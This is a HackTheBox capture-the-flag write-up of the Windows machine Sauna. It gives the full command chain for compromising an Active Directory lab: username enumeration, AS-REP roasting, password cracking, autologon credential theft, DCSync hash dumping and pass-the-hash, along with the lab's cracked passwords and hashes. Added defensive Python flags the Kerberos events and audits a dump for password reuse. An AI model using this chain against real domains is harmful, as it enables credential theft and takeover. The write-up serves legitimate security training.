Sauna is one of the machines currently available on the HackTheBox hacking platform, rated easy difficulty.
In this case it is a machine running the Windows operating system.
Port scanning
As usual, we add the Sauna machine's IP, 10.10.10.175, to /etc/hosts as sauna.htb and start with an nmap port scan.
```
# Nmap 7.80 scan initiated Mon May 11 13:08:47 2020 as: nmap -sV -Pn -p- -sC -oA sauna-nmap2 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.052s latency).
Not shown: 65515 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-05-11 18:14:16Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
58183/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/11%Time=5EB932B6%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h03m33s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-05-11T18:16:35
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 11 13:15:38 2020 -- 1 IP address (1 host up) scanned in 411.58 seconds
```
Once the scan is done we go through the open ports. We see there is an Active Directory domain, EGOTISTICAL-BANK.LOCAL, which will probably help us obtain information about the system, but we will work through the possible options step by step.
We move on to port 80, where we see the following web portal:
We look around the website a bit and don't see any obvious vector there either. We also search for vulnerabilities in IIS version 10.0, but don't find much relevant information about it.
Enumeration
We then run several enumerations against the services to try to gather enough data to gain access to the machine.
As a first option we use the enum4linux Perl script:
```
$ enum4linux -a 10.10.10.175
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 11 15:54:35 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.175
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.175    |
 ====================================================
[E] Can't find workgroup/domain

 ============================================
|    Nbtstat Information for 10.10.10.175    |
 ============================================
Looking up status of 10.10.10.175
No reply from 10.10.10.175

 =====================================
|    Session Check on 10.10.10.175    |
 =====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.175 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

 ===========================================
|    Getting domain SID for 10.10.10.175    |
 ===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766
[+] Host is part of a domain (not a workgroup)

 ======================================
|    OS information on 10.10.10.175    |
 ======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.175 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.175 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 =============================
|    Users on 10.10.10.175    |
 =============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 =========================================
|    Share Enumeration on 10.10.10.175    |
 =========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.175

 ====================================================
|    Password Policy Information for 10.10.10.175    |
 ====================================================
[E] Unexpected error from polenum:

[+] Attaching to 10.10.10.175 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:10.10.10.175)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[E] Failed to get password policy with rpcclient

 ==============================
|    Groups on 10.10.10.175    |
 ==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting local groups:

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:

[+] Getting domain group memberships:

 =======================================================================
|    Users on 10.10.10.175 via RID cycling (RIDS: 500-550,1000-1050)    |
 =======================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.

 =============================================
|    Getting printer info for 10.10.10.175    |
 =============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED

enum4linux complete on Mon May 11 15:55:10 2020
```
Here, too, we don't get much information: null sessions are allowed, but every query beyond the domain SID comes back NT_STATUS_ACCESS_DENIED.
We keep investigating with different tools and in the end go back to the website, where we notice a series of people listed in the team section:
So we build a list of candidate usernames to find out whether any of them exist in the domain, and end up with the following dictionary of a few naming combinations:
```
fergussmith
shauncoins
bowietaylor
sophiedriver
hugobear
stevenkerb
fsmith
scoins
btaylor
sdriver
hbear
skerb
```
We use the GetNPUsers.py tool from the Impacket suite to find out whether any of the users in our dictionary exist in the domain. The tool requests a TGT for each name without pre-authentication: the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for accounts that do not exist, and for an account that exists with Kerberos pre-authentication disabled it returns an AS-REP whose encrypted part can be cracked offline.
```
$ GetNPUsers.py EGOTISTICAL-BANK.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0ad8638de81e3aa9d386ae89f2a11914$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
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
```
And it turns out that one of them, fsmith, does exist; since that account does not require pre-authentication, the tool also hands us the AS-REP hash derived from the user's password:
```
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:0ad8638de81e3aa9d386ae89f2a11914$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
```
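Both steps above leave a footprint on the domain controller: each non-existent name produces a Kerberos event 4768 with status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), and the roastable account produces a 4768 with pre-authentication type 0 and RC4 etype 0x17, which is what the $krb5asrep$23$ prefix encodes. The detection logic below is an added example, not part of the original writeup; the event records are constructed, and 10.10.14.2 is an assumed scanning host. The fix on the account side is to clear the "Do not require Kerberos preauthentication" flag.

```python
"""Flag username enumeration and AS-REP roasting in Windows event 4768.
Constructed example: records are key=value renderings of the event, not
real DC logs; 10.10.14.2 is an assumed scanning host.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of event 4768 (Kerberos authentication ticket requested).
# Failed requests carry PreAuthType "-" and TicketEncryptionType 0xffffffff,
# as Windows logs them; the 4769 line is there to show it is ignored.
SAMPLE_4768 = """\
EventID=4768 TargetUserName=fergussmith TargetDomainName=EGOTISTICAL-BANK.LOCAL IpAddress=10.10.14.2 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
EventID=4768 TargetUserName=shauncoins TargetDomainName=EGOTISTICAL-BANK.LOCAL IpAddress=10.10.14.2 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
EventID=4768 TargetUserName=bowietaylor TargetDomainName=EGOTISTICAL-BANK.LOCAL IpAddress=10.10.14.2 PreAuthType=- TicketEncryptionType=0xffffffff Status=0x6
EventID=4768 TargetUserName=fsmith TargetDomainName=EGOTISTICAL-BANK.LOCAL IpAddress=10.10.14.2 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
EventID=4768 TargetUserName=hsmith TargetDomainName=EGOTISTICAL-BANK.LOCAL IpAddress=10.10.10.20 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
EventID=4769 TargetUserName=hsmith@EGOTISTICAL-BANK.LOCAL IpAddress=10.10.10.20 TicketEncryptionType=0x12 Status=0x0
"""

KV_RE = re.compile(r"(\w+)=(\S+)")


@dataclass
class TgtRequest:
    user: str
    source_ip: str
    pre_auth_type: Optional[int]  # None when the KDC rejected the request
    etype: Optional[int]
    status: int                    # Kerberos error code, 0 on success


def _to_int(value: str) -> Optional[int]:
    """Parse '0', '0x17' or '0xffffffff'; '-' (not applicable) becomes None."""
    try:
        return int(value, 0)
    except ValueError:
        return None


def parse_4768(line: str) -> Optional[TgtRequest]:
    """Return a TgtRequest for an event 4768 line, None for anything else."""
    fields = dict(KV_RE.findall(line))
    if fields.get("EventID") != "4768":
        return None
    return TgtRequest(
        user=fields.get("TargetUserName", "").lower(),
        source_ip=fields.get("IpAddress", ""),
        pre_auth_type=_to_int(fields.get("PreAuthType", "-")),
        etype=_to_int(fields.get("TicketEncryptionType", "-")),
        status=_to_int(fields.get("Status", "0x0")) or 0,
    )


def asrep_roastable(events: List[TgtRequest]) -> List[str]:
    """Accounts issued a TGT with no pre-auth (type 0) and RC4 (0x17):
    their AS-REP is crackable offline, which is what happened to fsmith."""
    return sorted({e.user for e in events
                   if e.status == 0 and e.pre_auth_type == 0 and e.etype == 0x17})


def enumeration_sources(events: List[TgtRequest], threshold: int = 3) -> Dict[str, int]:
    """Source IPs with at least `threshold` unknown-principal failures (0x6),
    the footprint GetNPUsers leaves when it walks a username list."""
    unknown = Counter(e.source_ip for e in events if e.status == 0x6)
    return {ip: n for ip, n in unknown.items() if n >= threshold}


def analyse(log_text: str) -> Dict[str, object]:
    events = [e for e in map(parse_4768, log_text.splitlines()) if e]
    return {"roastable": asrep_roastable(events),
            "enumeration": enumeration_sources(events)}


if __name__ == "__main__":
    print(analyse(SAMPLE_4768))
```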
With the hash in hand we use John The Ripper to try to crack it and recover the plaintext password:
```
$ john --wordlist=/usr/share/wordlists/rockyou.txt fsmith.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:24 DONE (2020-05-11 16:37) 0.04125g/s 434777p/s 434777c/s 434777C/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
To confirm it we use the --show option:
```
$ john --show fsmith.hash
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:Thestrokes23

1 password hash cracked, 0 left
```
Getting the user flag
Now that we have a set of credentials, we use the evil-winrm tool to try to access the machine over port 5985, which the scan identified as Microsoft HTTPAPI httpd (the WinRM listener):
```
$ ruby evil-winrm.rb -i 10.10.10.175 -u fsmith -p Thestrokes23 -P 5985

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents>
```
And we are in. We check whether the flag is on the user's desktop:
```
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
*Evil-WinRM* PS C:\Users\FSmith> cd desktop
*Evil-WinRM* PS C:\Users\FSmith\desktop> dir


    Directory: C:\Users\FSmith\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\desktop>
```
Good, we have the user flag.
Lateral escalation
Now that we have the first user, after several checks it looks like we will need to move to another user before we can reach SYSTEM.
We check which home directories exist on the system in order to identify the possible users, and find the following:
```
fsmith
hsmith
svc_loanmgr
Administrator
krbtgt
Guest
```
We upload the PowerUp script from the PowerTools suite to enumerate the privilege-escalation possibilities present on the system:
```
*Evil-WinRM* PS C:\Temp> upload /root/github/PowerTools/PowerUp/PowerUp.ps1 C:\Temp\powerup.ps1
Info: Uploading /root/github/PowerTools/PowerUp/PowerUp.ps1 to C:\Temp\powerup.ps1

Data: 659812 bytes of 659812 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Temp> dir


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/11/2020   2:59 PM         494860 powerup.ps1


*Evil-WinRM* PS C:\Temp>
```
Next we open a PowerShell console with the execution policy bypassed, import the module and run the full set of checks:
```
*Evil-WinRM* PS C:\Temp> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Temp> *Evil-WinRM* PS C:\Temp> Import-Module c:\Temp\powerup.ps1
*Evil-WinRM* PS C:\Temp> Invoke-AllChecks
```
Which gives us the following result:
```
[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...
Access denied
At C:\Temp\powerup.ps1:457 char:21
+     $VulnServices = Get-WmiObject -Class win32_service | Where-Object ...
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

[*] Checking service executable and argument permissions...
Access denied
At C:\Temp\powerup.ps1:488 char:5
+     Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

[*] Checking service permissions...
Access denied
At C:\Temp\powerup.ps1:534 char:17
+     $Services = Get-WmiObject -Class win32_service | Where-Object {$_ ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

[*] Checking %PATH% for potentially hijackable .dll locations...

HijackablePath : C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps\
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command '...'

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

DefaultDomainName    : EGOTISTICALBANK
DefaultUserName      : EGOTISTICALBANK\svc_loanmanager
DefaultPassword      : Moneymakestheworldgoround!
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :

[*] Checking for vulnerable registry autoruns and configs...

[*] Checking for vulnerable schtask files/configs...

[*] Checking for unattended install files...

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...
```
Among all that there is one interesting find: autologon credentials stored in the registry, which look like those of the svc_loanmgr user even though the stored username (svc_loanmanager) does not match the account name we found on the system:
```
DefaultDomainName    : EGOTISTICALBANK
DefaultUserName      : EGOTISTICALBANK\svc_loanmanager
DefaultPassword      : Moneymakestheworldgoround!
```
We try logging in with the account we saw earlier (svc_loanmgr) and this password, and we are in:
```
$ ruby evil-winrm.rb -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround! -P 5985

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
```
This user does not have administrator permissions either, though.
Privilege escalation
Continuing with enumeration, we now run the winPEAS.exe tool to gather more information. I paste only the relevant part because of the huge amount of output it produces:
```
==============================(Interesting files and registry)==============================

  [+] Putty Sessions()
    Not Found

  [+] Putty SSH Host keys()
    Not Found

  [+] SSH keys in registry()
   [?] If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#ssh-keys-in-registry
    Not Found

  [+] Cloud Credentials(T1538&T1083&T1081)
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
    Not Found

  [+] Unnattend Files()

  [+] Looking for common SAM & SYSTEM backups()
    C:\Windows\System32\config\RegBack\SAM
    C:\Windows\System32\config\RegBack\SYSTEM

  [+] Looking for McAfee Sitelist.xml Files()

  [+] Cached GPP Passwords()
    [X] Exception: Could not find a part of the path 'C:\ProgramData\Microsoft\Group Policy\History'.

  [+] Looking for possible regs with creds(T1012&T1214)
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#inside-the-registry
    Not Found
    Not Found
    Not Found
    Not Found

  [+] Looking for possible password files in users homes(T1083&T1081)
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
    C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml

  [+] Looking inside the Recycle Bin for creds files(T1083&T1081&T1145)
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
    Not Found

  [+] Searching known files that can contain creds in home(T1083&T1081)
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files

  [+] Looking for documents --limit 100--(T1083)
    Not Found
```
Here we see that the user can reach certain sensitive files that could be very helpful:
```
  [+] Looking for common SAM & SYSTEM backups()
    C:\Windows\System32\config\RegBack\SAM
    C:\Windows\System32\config\RegBack\SYSTEM
```
So we use the secretsdump.py tool, also part of the Impacket suite, to try to obtain the domain hashes of the existing users:
```
$ secretsdump.py svc_loanmgr:"Moneymakestheworldgoround!"@10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:9495fdc3d7471fc8dab4fbd657355e57:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:ff8ac685ca912f261e2ca731820c3c5d8c0eddb80073a6a7c1d2f1dc60ccca96
SAUNA$:aes128-cts-hmac-sha1-96:75d137f4b4577aa0351a995753093f3d
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...
```
And we have a list of hashes that includes, among others, the credentials of the Administrator user. Note the line "[*] Using the DRSUAPI method to get NTDS.DIT secrets": the secrets were pulled through directory replication (a DCSync), which works because svc_loanmgr holds replication rights on the domain, not through the SAM backup files found above.
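The dump also shows HSmith and FSmith carrying the same NT hash, which means the same password. A small audit that a defender can run over such a dump, as an added example that is not part of the original writeup (the sample lines reuse the account names and hash values quoted on this page), flags exactly that, plus empty-password accounts and any residual LM hashes:

```python
"""Audit a secretsdump-style NTDS dump for weak-credential signals.
Parses lines in the domain\\user:rid:lmhash:nthash::: format that
secretsdump.py prints and reports: accounts whose NT hash is the
empty-password hash, accounts still storing a non-blank LM hash, and
groups of accounts sharing one NT hash (same password). Machine accounts
(names ending in $) are excluded from the reuse check because their
passwords are random. Sample lines reuse the values quoted on this page.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty string

# Sample dump as printed by secretsdump; status and Kerberos-key lines are
# included to show they are skipped. Values are those quoted on this page.
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:9495fdc3d7471fc8dab4fbd657355e57:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
"""


class Entry(NamedTuple):
    account: str  # sAMAccountName without the DOMAIN\ prefix
    rid: int
    lm: str
    nt: str


# Optional "DOMAIN\" prefix, then user:rid:lm:nt::: with 32-hex-digit hashes.
LINE_RE = re.compile(
    r"^(?:[^\\:]+\\)?(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


def parse_dump(text: str) -> List[Entry]:
    """Return one Entry per credential line; status and key lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append(Entry(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def audit(entries: List[Entry]) -> Dict[str, object]:
    """Weak-credential findings over a parsed dump."""
    by_nt = defaultdict(list)
    for e in entries:
        if not e.account.endswith("$"):  # skip machine accounts
            by_nt[e.nt].append(e.account)
    return {
        "empty_password": [e.account for e in entries if e.nt == EMPTY_NT],
        "lm_hash_present": [e.account for e in entries if e.lm != EMPTY_LM],
        "shared_password": [sorted(v) for v in by_nt.values() if len(v) > 1],
    }


if __name__ == "__main__":
    print(audit(parse_dump(SAMPLE_DUMP)))
```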
Getting the root flag
With the hashes obtained, we use wmiexec.py, also included in Impacket, to access the system as Administrator by passing the NT hash directly (no cracking needed):
```
$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
egotisticalbank\administrator

C:\>cd users\administrator\desktop

C:\users\administrator\desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\users\administrator\desktop

01/23/2020  04:11 PM    <DIR>          .
01/23/2020  04:11 PM    <DIR>          ..
01/23/2020  11:22 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,125,000,192 bytes free

C:\users\administrator\desktop>
```
And we have our root flag, completing the machine and earning our points.
If you are a HackTheBox user and liked my writeup, please give me respect at the following link: https://www.hackthebox.eu/home/users/profile/103792